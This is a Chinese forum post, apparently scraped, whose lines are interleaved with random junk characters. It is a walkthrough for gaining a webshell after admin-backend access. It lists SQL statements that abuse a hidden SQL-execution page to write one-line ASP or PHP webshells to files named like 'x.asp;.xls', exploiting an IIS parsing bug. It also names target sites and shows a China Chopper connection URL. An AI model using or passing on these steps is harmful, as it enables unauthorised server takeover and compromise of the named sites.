好不容易进了后台,发现啥上传啊。备份啊多木有。7 i2 X' p$ D1 i1 m' v- |7 C, i" b
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
9 k8 k: \ M0 a6 x& U文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
) i- j* N, h, {3 ^: [然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
; R. a' g1 P! e- l# t7 P2 \1.create table cmd (a varchar(50))
; H7 `" q* Z' l E- R9 }2.insert into cmd (a) values (‘‘): j# d4 ~7 U/ u% _4 M- B
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd- X( U3 L7 @! p
(把表cmd的内容导出为物理路径的一个EXCEL文件)3 U7 V8 x2 S; | E- s
4.drop table cmd
7 T. i# T0 ?2 {; K3 b# k7 g; w6 F9 P利用IIS的BUG成功拿到了WEBSHELL。, W- D& {1 M* i9 \; [
! m6 w" J3 v! Q. j! n- z
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
/ C/ i0 p8 s" h& x4 ]( R/ L/ N! n$ v6 l) G' ?- Q
SQL语句意思解释:
7 }' [) ?0 A5 t8 c3 T 第一句 g) F- o7 d2 u" W# g4 ~. L
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为507 d+ z6 E4 P+ b- Q- w
6 | a2 Z( Q, J* _ 第二句+ E2 X6 F( x2 E1 a2 K: s
在表cmd的a字段插入一句话木马5 c2 z5 K+ A$ N
第三句
* }( I2 R( a, G& w2 ?- C 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
* h( E n. r* j1 `3 M/ g: g$ R) M% d- d0 y
第四句
% P+ h9 L( s) |" Z 删除建立的cmd表
& E* J3 S5 S' U) E* ^
4 O! j% v4 t. R* b" u 以下内容为测试:& k ]% v6 A, ^5 l7 m
Access利用后台SQL执行命令功能导出WebShell:
: s% I% D# Q( f! W 这个更简单:6 n d) `* k2 n
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
5 d L5 r6 y% X4 }2 I. j0 q 或者0 L/ G5 q3 R6 Q8 x6 v
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
# [. _+ J! l& `( m7 j& w V; P) M% y$ G7 ~1 W, g
后台有执行SQL语句功能(vote为已知表段)
1 E7 [8 [2 s: ^+ A% p8 z/ [4 F 希望对大家有所帮助拿shell的又一个思路
( I x9 C ~/ \9 ] |